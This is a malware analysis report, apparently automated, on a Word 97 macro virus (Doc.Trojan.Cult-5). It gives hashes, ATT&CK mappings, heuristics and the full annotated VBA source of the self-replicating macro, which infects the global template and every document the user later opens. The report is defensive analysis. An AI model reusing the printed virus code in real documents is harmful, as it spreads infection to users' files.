Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b28f7336e4a5db7c…

MALICIOUS

Office (OLE)

36.5 KB Created: 2004-05-17 07:18:00 Authoring application: Microsoft Word 8.0 (Word 97) First seen: 2012-06-14. The creation time and authoring application are read from the OLE SummaryInformation stream and are attacker-controllable; treat them as hints, not facts. A Word 97 origin is consistent with the macro source below, which has the shape of WordBasic auto-converted to VBA (every action goes through `WordBasic.*` compatibility calls).
MD5: 7031f33786a9d1c7de72e6f3a4badb6a SHA-1: b1fdb8c50f93f68fc9e431a0c4acb7a11f5ccc61 SHA-256: b28f7336e4a5db7c6f2eec55536c0a9625d5dd659a2fe4f637ca8a49ea95be17
160 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic (Command and Scripting Interpreter). The copy of the macro into the global template (`MacroCopy ... "Global:cULT"`) and the hooking of built-in File-menu commands so they call `cULT.DoIt` also fit T1137.001 Office Template Macros (Office Application Startup).

The sample is identified as a malicious document by ClamAV, specifically 'Doc.Trojan.Cult-5'. The only auto-executing module is named AuToClOsE (a mixed-case spelling of AutoClose), so the initial trigger is closing the infected document, not opening it. On that trigger, MAIN copies the module into the global template as a macro named `cULT` (skipping if one already exists), derives two built-in command names from the first two entries of the first menu — apparently FileNew and FileOpen in a default English Word install, since `MenuText$`/`MenuItemText$` are resolved at run time — opens each in the macro editor and appends a `cULT.DoIt` call. From then on, `DoIt` runs whenever the user creates or opens a document: if the active document does not already carry an AuToClOsE macro, it is saved as a template (`FileSaveAs Format:=1`) and the `cULT` macro is copied into it as AuToClOsE. This is a classic Word 6/95-era macro virus (infect global template, then every document touched) rather than a network worm; the extracted macro source is complete (it ends at DoIt's `End Sub`), only the appended p-code dump in the preview is truncated. Note that `DoIt` references a label `Finish` that is not defined in that Sub, which would not compile as VBA — possibly a WordBasic-to-VBA conversion or extraction artifact, worth recording rather than assuming the routine runs exactly as shown. Detection artifacts visible in the source: a global macro named `cULT`, the inserted line `cULT.DoIt` in built-in command macros, documents saved in template format, and the author tag `CULT! Nightmare Joker (SLAM)`.

Heuristics 4

  • ClamAV: Doc.Trojan.Cult-5 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Cult-5
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
Module named AuToClOsE (Word matches auto-macro names case-insensitively, so this is an AutoClose handler) containing a `Public Sub MAIN`; it runs automatically when the document is closed, without any further user interaction beyond enabling macros.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12956 bytes
SHA-256: 04d4a2d586cc61cd1bc1769309d9c573168b9706bb58e2a07de8bda9253bcd81
Preview script
First 1,000 lines of the extracted script
' Header of the document class module ("ThisDocument"). The extracted source
' carries no procedures here; the payload lives entirely in the "AuToClOsE" module.
' VB_Base appears to be the standard Word Document class GUID (not sample-specific).
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


' Module name is a mixed-case spelling of AutoClose. Word's auto-macro lookup is
' case-insensitive, so MAIN below fires when the infected document is closed; the
' odd casing is presumably cosmetic or an attempt to dodge simple string matching.
Attribute VB_Name = "AuToClOsE"

' Builds the name of a built-in Word command from the menu bar at run time:
' <first menu name> + <first item on that menu>, both stripped of accelerator
' and punctuation characters. In a default English Word install this should
' yield "FileNew" (File menu, item 1) — hedged, since MenuText$/MenuItemText$
' resolve against the live UI and locale.
' h$ is a ByRef parameter that is overwritten with the cleaned item name as a
' side effect; callers pass the same variable to Name1$ and Name2$ and ignore it.
Private Function Name1$(h$)
Dim a$
Dim x
Dim i
Dim l
Dim d$
Dim e$
Dim z
Dim AA$
Dim y
Dim k$
Dim CC$
' Raw text of the first menu (argument semantics per WordBasic MenuText$ — confirm).
a$ = WordBasic.[MenuText$](0, 1, 0)
x = Len(a$) + 1: i = 1: l = 1
' Pass 1: copy the menu name into e$, dropping '&' (accelerator), '.' and ' '.
Again:
If i = x Then GoTo GOON
d$ = Mid(a$, i, 1)
If d$ = Chr(38) Or d$ = Chr(46) Or d$ = Chr(32) Then
    i = i + 1
    GoTo Again
Else
    e$ = e$ + d$
    i = i + 1
    GoTo Again
End If
GOON:
' z = length of the cleaned menu name + 1; used below to truncate the item name.
z = Len(e$) + 1
' Text of item 1 on that menu.
AA$ = WordBasic.[MenuItemText$](e$, 0, 1, 0)
y = Len(AA$) + 1
' Pass 2: copy the item text into CC$, dropping '&', '.', ' ', '-' and '/'.
Again2:
If l = y Then GoTo Finish
k$ = Mid(AA$, l, 1)
If k$ = "&" Or k$ = Chr(46) Or k$ = Chr(32) Or k$ = "-" Or k$ = "/" Then
    l = l + 1
    GoTo Again2
Else
    CC$ = CC$ + k$
    l = l + 1
    GoTo Again2
End If
Finish:
' Keep at most Len(menu)+1 chars of the item name (e.g. "New" for "File").
h$ = WordBasic.[Left$](CC$, z)
Name1$ = e$ + h$
End Function

' Identical to Name1$ except that it reads item 2 of the first menu, so in a
' default English Word install it should yield "FileOpen" — hedged for the same
' reason (resolved against the live menu bar and locale at run time).
' Like Name1$, it clobbers its ByRef parameter h$ with the cleaned item name.
Private Function Name2$(h$)
Dim a$
Dim x
Dim i
Dim l
Dim d$
Dim e$
Dim z
Dim AA$
Dim y
Dim k$
Dim CC$
' Raw text of the first menu.
a$ = WordBasic.[MenuText$](0, 1, 0)
x = Len(a$) + 1: i = 1: l = 1
' Strip '&', '.' and ' ' from the menu name into e$.
Again:
If i = x Then GoTo GOON
d$ = Mid(a$, i, 1)
If d$ = Chr(38) Or d$ = Chr(46) Or d$ = Chr(32) Then
    i = i + 1
    GoTo Again
Else
    e$ = e$ + d$
    i = i + 1
    GoTo Again
End If
GOON:
z = Len(e$) + 1
' The only difference from Name1$: item 2 instead of item 1.
AA$ = WordBasic.[MenuItemText$](e$, 0, 2, 0)
y = Len(AA$) + 1
' Strip '&', '.', ' ', '-' and '/' from the item text into CC$.
Again2:
If l = y Then GoTo Finish
k$ = Mid(AA$, l, 1)
If k$ = "&" Or k$ = Chr(46) Or k$ = Chr(32) Or k$ = "-" Or k$ = "/" Then
    l = l + 1
    GoTo Again2
Else
    CC$ = CC$ + k$
    l = l + 1
    GoTo Again2
End If
Finish:
h$ = WordBasic.[Left$](CC$, z)
Name2$ = e$ + h$
End Function

' Entry point of the AuToClOsE module; runs when an infected document is closed.
' Stage 1 of the infection: install a global copy of this macro (named "cULT")
' and hook two built-in commands so that cULT.DoIt runs on later document
' create/open events. Context value 0 in CountMacros/MacroName$ appears to mean
' the global template and 1 the active document, inferred from the MacroCopy
' source/destination pairing here and in DoIt — confirm against WordBasic docs.
Public Sub MAIN()
Dim o
Dim k
Dim m$
Dim h$
Dim n$
If WordBasic.CountMacros(0) > 0 Then
' Infection marker check: a global macro literally named "cULT" means the
' template is already infected, so do nothing. (Default VBA string compare is
' case-sensitive, so the check only matches the spelling this code itself writes.)
For o = 1 To WordBasic.CountMacros(0)
If WordBasic.[MacroName$](o, 0) = "cULT" Then
    k = 1
End If
Next o
If k = 1 Then
    GoTo Finish
Else
    ' Copy this document's AuToClOsE module into the global template as "cULT".
    ' Detection artifact: a global macro named "cULT".
    WordBasic.MacroCopy WordBasic.[WindowName$]() + ":AuToClOsE", "Global:cULT"
    WordBasic.ScreenUpdating
    ' Derive the two built-in command names (likely "FileNew" and "FileOpen").
    m$ = Name1$(h$): n$ = Name2$(h$)
    ' Open each built-in command in the macro editor (Show:=1 presumably selects
    ' the Word-commands list; editing a built-in name creates an overriding macro)
    ' and let InsertCode type a "cULT.DoIt" call into it.
    WordBasic.ToolsMacro Name:=m$, Show:=1, Edit:=1
    InsertCode
    WordBasic.ToolsMacro Name:=n$, Show:=1, Edit:=1
    InsertCode
    ' Persist the modified global template without prompting.
    WordBasic.FileSaveAll 1, 1
    WordBasic.ScreenUpdating
End If
Finish:

' Author/group tag; usable as a static detection string.
Rem CULT! Nightmare Joker (SLAM)

End If
End Sub

' Edits the macro currently open in the editor window (opened by ToolsMacro in
' MAIN) using cursor-movement commands, then closes and saves it. Net effect:
' a space is inserted at line 2, column 10 (purpose unclear — possibly to mark
' or perturb the built-in command's text; not determinable from this code), and
' a new line "cULT.DoIt" is appended after line 4, so the hooked command calls
' the global infection routine each time it runs.
Private Sub InsertCode()
WordBasic.StartOfDocument
WordBasic.LineDown 1
WordBasic.CharRight 10
WordBasic.Insert Chr(32)
WordBasic.StartOfDocument
WordBasic.LineDown 4
WordBasic.EndOfLine
WordBasic.InsertPara
' Detection artifact: the literal line "cULT.DoIt" inside built-in command macros.
WordBasic.Insert "cULT.DoIt"
' DocClose 1: close the macro editing window, saving changes.
WordBasic.DocClose 1
End Sub

' Stage 2 of the infection, invoked via the "cULT.DoIt" line that InsertCode
' planted in the hooked built-in commands. If the active document does not yet
' carry an "AuToClOsE" macro, it is converted to a template and the global
' "cULT" macro is copied into it under that name, making it a new carrier.
Private Sub DoIt()
Dim o
Dim Infect
' NOTE(review): "Finish" is not defined anywhere in this Sub. As extracted this
' line would fail VBA compilation ("Label not defined"); likely a WordBasic-to-VBA
' conversion or extraction artifact — flag in the report rather than assume DoIt
' executes exactly as shown.
On Error GoTo -1: On Error GoTo Finish
' Scan the active document's macros (context 1) for an existing AuToClOsE copy.
If WordBasic.CountMacros(1) > 0 Then
For o = 1 To WordBasic.CountMacros(1)
    If WordBasic.[MacroName$](o, 1) = "AuToClOsE" Then
            Infect = 1
    End If
Next o
End If
If Infect = 0 Then
' Format:=1 saves the active document as a template so it can hold macros.
' Detection artifact: ordinary documents silently re-saved in template format.
WordBasic.FileSaveAs Format:=1
' Copy the global "cULT" macro into the document as "AuToClOsE".
WordBasic.MacroCopy "Global:cULT", WordBasic.[WindowName$]() + ":AuToClOsE"
WordBasic.FileSaveAll 1, 1
End If
End Sub

' Processing file: /opt/analyzer/scan_staging/c3f6d07cccc84c359ce88c9a72a2e221.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 979 bytes
' Line #0:
' Macros/VBA/AuToClOsE - 7824 bytes
' Line #0:
' Line #1:
' 	FuncDefn (Private Function Name1(h))
' Line #2:
' 	Dim 
' 	VarDefn a
' Line #3:
' 	Dim 
' 	VarDefn x
' Line #4:
' 	Dim 
' 	VarDefn i
' Line #5:
' 	Dim 
' 	VarDefn l
' Line #6:
' 	Dim 
' 	VarDefn d
' Line #7:
' 	Dim 
' 	VarDefn e
' Line #8:
' 	Dim 
' 	VarDefn z
' Line #9:
' 	Dim 
' 	VarDefn AA
' Line #10:
' 	Dim 
' 	VarDefn y
' Line #11:
' 	Dim 
' 	VarDefn k
' Line #12:
' 	Dim 
' 	VarDefn CC
' Line #13:
' 	LitDI2 0x0000 
' 	LitDI2 0x0001 
' 	LitDI2 0x0000 
' 	Ld WordBasic 
' 	ArgsMemLd [MenuText$] 0x0003 
' 	St a$ 
' Line #14:
' 	Ld a$ 
' 	FnLen 
' 	LitDI
... (truncated)